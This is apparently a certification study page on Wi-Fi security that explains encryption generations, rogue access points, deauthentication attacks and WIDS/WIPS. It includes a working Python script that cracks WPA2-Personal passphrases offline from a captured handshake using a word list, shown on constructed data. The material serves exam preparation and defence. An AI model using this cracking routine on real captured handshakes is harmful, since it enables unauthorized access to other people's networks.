We’ve spent a lot of time discussing wired networks, but it’s important to discuss wireless networks as well.
Wireless networks are any networks that transmit data over the air instead of over a physical wire. Wait a minute, though. What about cellular networks and Bluetooth? Technically, those are wireless, but for the purposes of the SSCP exam, (ISC)2 wants you to focus on the Wi-Fi (IEEE 802.11) networks served by wireless access points and routers in home and business networks.
Wireless networks rely on transmission security to ensure that the data is protected. An attacker on a wired network either needs to be connected to that network or physically tapped into a network cable. A wireless network attacker just needs to be nearby.
Wireless transmission security options include:
- Open – No encryption or password. From a security standpoint, this is right out.
- WEP – Wired Equivalent Privacy. This was the industry’s first attempt at encrypting wireless data. Unfortunately, attackers figured out how to crack WEP very quickly (its RC4 key scheduling and short initialization vectors let an attacker recover the key from captured traffic). Today, WEP is roughly the same as Open: fundamentally insecure.
- WPA – Wi-Fi Protected Access. This was developed as a stopgap response to the WEP weaknesses that could run on WEP-era hardware. WPA uses the Temporal Key Integrity Protocol (TKIP), which still relies on RC4 but mixes a fresh key for every packet. Much harder to crack than WEP, but TKIP has known weaknesses and is now deprecated.
- WPA2/802.11i – WPA2 added CCMP, an encryption protocol based on the Advanced Encryption Standard (AES), and made it mandatory. MUCH harder to crack; the practical attack against WPA2-Personal is guessing a weak pre-shared key, not breaking the cipher.
- WPA3 – The latest generation. WPA3-Personal replaces the pre-shared key handshake with Simultaneous Authentication of Equals (SAE), so an attacker who captures the handshake can no longer guess the passphrase offline, and WPA3 makes protected management frames mandatory.
One of the most popular wireless attacks is a man-in-the-middle attack. In this scenario, an attacker stands up a rogue access point (AP) and pretends to be a known/trusted network. Once a user connects to that rogue AP, the attacker can monitor and modify any of the traffic that passes through that device.
Attackers may also launch a denial of service (DoS) attack against a wireless network. In this scenario, an attacker continually sends spoofed deauthentication frames telling a connected wireless device to disconnect from the access point. This works because 802.11 management frames were historically unauthenticated; 802.11w protected management frames (optional in WPA2, mandatory in WPA3) are the countermeasure. On an unprotected network the end result is that the end user can’t access the wireless network at all.
Attackers can also use the same tools (Aircrack-ng is a perfect example) to force that disconnection just once, and then capture the WPA2 four-way handshake when the wireless client reconnects. The handshake doesn’t contain the key itself, but it carries enough (both nonces, both MAC addresses, and a message integrity code computed from the key) for the attacker to test candidate passphrases offline, deriving a key from each guess and checking whether it reproduces the captured integrity code. With the pre-shared key (PSK) recovered, an attacker may then be able to join the target wireless network directly.
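The following is an added example, not code from the original page, that reproduces the offline check just described so the weakness is concrete: PBKDF2 turns each candidate passphrase and the SSID into a pairwise master key, the 802.11i PRF expands it with both MAC addresses and both nonces into a pairwise transient key, and the first 16 bytes of that key verify the message 2 MIC. The SSID, MAC addresses, nonces, EAPOL frame bytes, passphrase and word list are all constructed for the example; a real run would take them from a capture file.

```python
"""Offline passphrase recovery from a captured WPA2 four-way handshake.

Added example, not code from the original page; it reproduces what tools
like Aircrack-ng do so the weakness is clear. The SSID, MAC addresses,
nonces, EAPOL frame and passphrase are constructed; a real run would take
them from a capture file."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key, label, data):
    """IEEE 802.11i PRF-512: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_ptk(pmk, ap_mac, client_mac, anonce, snonce):
    """The PTK binds the PMK to both MACs and both nonces; its first 16 bytes are the KCK."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame):
    """WPA2/CCMP message 2 MIC: first 16 bytes of HMAC-SHA1(KCK, frame with MIC field zeroed)."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, ap_mac, client_mac, anonce, snonce, eapol_frame, captured_mic, wordlist):
    """Test each candidate passphrase offline against the captured MIC."""
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return candidate
    return None


# Constructed "capture": what a sniffer would see in message 2 of the handshake.
SSID = "LabNet"
AP_MAC = bytes.fromhex("02001122aabb")
CLIENT_MAC = bytes.fromhex("02003344ccdd")
ANONCE = hashlib.sha256(b"constructed anonce").digest()
SNONCE = hashlib.sha256(b"constructed snonce").digest()
# Stand-in EAPOL-Key frame with the MIC field zeroed (not a byte-accurate 802.1X frame).
EAPOL_FRAME = b"\x01\x03\x00\x5f\x02\x01\x0a" + b"\x00" * 92
REAL_PASSPHRASE = "correct-horse-battery"     # the network's secret, unknown to the attacker


def simulated_capture():
    """The MIC a real client would have placed in message 2 for REAL_PASSPHRASE."""
    kck = derive_ptk(pmk_from_passphrase(REAL_PASSPHRASE, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_FRAME)


WORDLIST = ["password", "LabNet2024", "letmein", "correct-horse-battery", "hunter2"]


def run_demo():
    """Recover the passphrase from the constructed capture using WORDLIST."""
    return crack_handshake(SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, EAPOL_FRAME,
                           simulated_capture(), WORDLIST)


if __name__ == "__main__":
    print("recovered passphrase:", run_demo())
```

Every guess costs 4096 HMAC-SHA1 iterations, which slows an attacker but doesn’t stop one: GPU crackers test hundreds of thousands of candidates per second, so the only real defence on WPA2-Personal is a long random passphrase (or WPA2-Enterprise with 802.1X, where there is no shared passphrase to guess). WPA3-SAE removes the attack entirely because the PMK no longer derives from the passphrase in a way a captured handshake can verify.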
Many of the wired security practices we’ve already discussed apply to wireless as well: system hardening, patching, locking down management interfaces, and so on. However, you may want to deploy a wireless security device as well.
Wireless security devices can either be dedicated (standalone sensors) or integrated (baked into the access points themselves). Dedicated sensors may be preferable for environments with a high volume of wireless traffic, since an integrated device that is also serving clients has to time slice between providing wireless access and scanning channels for attacks, so it misses some of what a full-time sensor would see.
These devices are often categorized as either wireless intrusion detection systems (WIDS) or wireless intrusion prevention systems (WIPS). WIDS devices alert admins without stopping potentially bad traffic, while WIPS devices shut down bad traffic based on known attack patterns (signatures) or suspicious behavior.
WIPS devices sound like a great idea, until you start running into false positives. An improperly tuned or overly aggressive WIPS device can kick legitimate users off of the wireless network, doing as much harm as an actual attacker who launched a DoS attack. An SSCP takes time to weigh the pros and cons of WIDS versus WIPS devices, and then deploys the appropriate solution after carefully configuring and testing that device.
If you want to learn more about wireless security protocols, the Wikipedia article on Wi-Fi Protected Access is actually a fantastic primer. You can also visit the Wikipedia article on Wireless Security for an in-depth analysis of wireless attacks and countermeasures.
What Else Should I Know About Network and Communications Security?
This is a high level introduction to the concepts you need to know as an SSCP, based on the (ISC)2 SSCP Certification Exam Outline. It’s not intended to be a deep-dive into everything you need to know in order to pass the exam.
You’ll increase your chances of passing the exam the first time if you read these two (2) books next:
- Start with the SSCP All-in-One Exam Guide (2nd Edition).
- Then read the (ISC)2 SSCP Official Study Guide.
If you prefer videos to books, use our list of recommended online training providers to take advantage of FREE offers to help you prepare for the exam.
Keep at it!
SSCP Domain 5 – Cryptography | SSCP Domain 7 – Systems and Applications Security